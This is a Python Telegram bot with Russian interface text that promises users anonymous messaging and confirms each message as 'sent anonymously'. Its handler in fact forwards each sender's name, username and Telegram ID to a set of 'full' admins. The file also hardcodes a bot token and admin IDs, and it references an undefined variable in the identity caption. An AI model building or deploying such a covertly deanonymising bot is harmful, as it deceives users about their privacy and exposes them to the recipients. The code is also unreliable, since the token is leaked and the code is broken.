from telegram import (
    Update,
    ReplyKeyboardMarkup,
    KeyboardButton
)
from telegram.ext import (
    ApplicationBuilder,
    ContextTypes,
    MessageHandler,
    CommandHandler,
    filters
)
import datetime

# ========= НАСТРОЙКИ =========
BOT_TOKEN = "8542679681:AAE8iNRt23pFoSYqOESvhD44Vq4jnnpQkYA"

FULL_ADMINS = [8066689541,1157418027]       # 👑 full админы
DEFAULT_ADMINS = [916852840,7729231060]    # 👮 обычные админы
ALL_ADMINS = FULL_ADMINS + DEFAULT_ADMINS

DAILY_LIMIT = 5

# ========= СОСТОЯНИЯ =========
WAITING_MESSAGE = "waiting_message"
user_state = {}
user_daily_count = {}
banned_users = set()

# ========= КНОПКИ =========
main_keyboard = ReplyKeyboardMarkup(
    [
        [KeyboardButton("✍️ Написать сообщение")],
        [KeyboardButton("ℹ️ О боте")]
    ],
    resize_keyboard=True
)

# ========= ХЕНДЛЕРЫ =========
async def start(update: Update, context: ContextTypes.DEFAULT_TYPE):
    await update.message.reply_text(
        "👋 Напиши анонимное сообщение",
        reply_markup=main_keyboard
    )


async def write_message(update: Update, context: ContextTypes.DEFAULT_TYPE):
    uid = update.effective_user.id
    if uid in banned_users:
        await update.message.reply_text("🚫 Вы заблокированы.")
        return

    user_state[uid] = WAITING_MESSAGE
    await update.message.reply_text("✍️ Напиши сообщение:")


async def about(update: Update, context: ContextTypes.DEFAULT_TYPE):
    await update.message.reply_text(
        "ℹ️ Анонимный бот для сообщений\n@anonymousaskkbot",
        reply_markup=main_keyboard
    )


def check_limit(uid: int) -> bool:
    today = datetime.date.today()
    if uid not in user_daily_count:
        user_daily_count[uid] = {"date": today, "count": 0}

    if user_daily_count[uid]["date"] != today:
        user_daily_count[uid] = {"date": today, "count": 0}

    if user_daily_count[uid]["count"] >= DAILY_LIMIT:
        return False

    user_daily_count[uid]["count"] += 1
    return True


async def handle_message(update: Update, context: ContextTypes.DEFAULT_TYPE):
    user = update.effective_user
    uid = user.id

    if uid in banned_users:
        return

    if user_state.get(uid) != WAITING_MESSAGE:
        return

    if not check_limit(uid):
        await update.message.reply_text("⚠️ Лимит 5 сообщений в день.")
        return

    user_state[uid] = None

    text = update.message.text or ""

    for admin in ALL_ADMINS:
        if admin in FULL_ADMINS:
            caption = (
                f"Пришло сообщение от:\n"
                f"👤 {user.first_name}\n"
                f"🔗 {username}\n"
                f"🆔 {uid}\n"
            )
            if text:
                caption += f"💬 {text}"
        else:
            caption = (
                "У тебя новое анонимное сообщение!\n\n"
            )
            if text:
                caption += f"{text}\n\n"
            caption += "@anonymousaskkbot"

        # ===== МЕДИА =====
        if update.message.photo:
            await context.bot.send_photo(
                admin,
                update.message.photo[-1].file_id,
                caption=caption
            )
        elif update.message.video:
            await context.bot.send_video(
                admin,
                update.message.video.file_id,
                caption=caption
            )
        elif update.message.voice:
            await context.bot.send_voice(
                admin,
                update.message.voice.file_id,
                caption=caption
            )
        elif update.message.audio:
            await context.bot.send_audio(
                admin,
                update.message.audio.file_id,
                caption=caption
            )
        elif update.message.video_note:
            await context.bot.send_video_note(
                admin,
                update.message.video_note.file_id
            )
            await context.bot.send_message(admin, caption)
        else:
            await context.bot.send_message(admin, caption)

    await update.message.reply_text(
        "✅ Сообщение отправлено анонимно",
        reply_markup=main_keyboard
    )


# ========= АДМИН КОМАНДЫ =========
async def ban(update: Update, context: ContextTypes.DEFAULT_TYPE):
    if update.effective_user.id not in FULL_ADMINS:
        return
    if not context.args:
        await update.message.reply_text("Используй: /ban ID")
        return

    banned_users.add(int(context.args[0]))
    await update.message.reply_text("🚫 Пользователь забанен")


async def unban(update: Update, context: ContextTypes.DEFAULT_TYPE):
    if update.effective_user.id not in FULL_ADMINS:
        return
    if not context.args:
        await update.message.reply_text("Используй: /unban ID")
        return

    banned_users.discard(int(context.args[0]))
    await update.message.reply_text("✅ Пользователь разбанен")


# ========= ЗАПУСК =========
def main():
    app = ApplicationBuilder().token(BOT_TOKEN).build()

    app.add_handler(CommandHandler("start", start))
    app.add_handler(CommandHandler("ban", ban))
    app.add_handler(CommandHandler("unban", unban))

    app.add_handler(MessageHandler(filters.Regex("^✍️ Написать сообщение$"), write_message))
    app.add_handler(MessageHandler(filters.Regex("^ℹ️ О боте$"), about))

    app.add_handler(MessageHandler(filters.ALL & ~filters.COMMAND, handle_message))

    print("🤖 Бот запущен")
    app.run_polling()


if __name__ == "__main__":
    main()
